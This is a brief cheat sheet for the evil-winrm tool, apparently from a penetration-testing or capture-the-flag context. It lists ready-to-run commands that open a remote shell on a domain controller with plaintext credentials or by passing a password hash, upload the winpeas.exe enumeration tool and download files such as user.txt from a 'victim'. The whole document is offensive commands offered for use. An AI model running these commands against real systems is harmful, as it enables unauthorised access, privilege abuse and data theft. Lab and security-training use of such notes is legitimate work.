evil-winrm

#With creds now open a shell to DC

evil-winrm -u 'Administrator' -p 'Password1' -i 10.0.0.1

#pass the hash

evil-winrm -u 'Administrator' -H '##hash###' -i 10.0.0.1

#Upload and Download

#to copy from Kali with a shell on the client. When connecting from kali the pwd is the working folder for download and upload.

upload winpeas.exe

#to copy from victim's shell to kali

download user.txt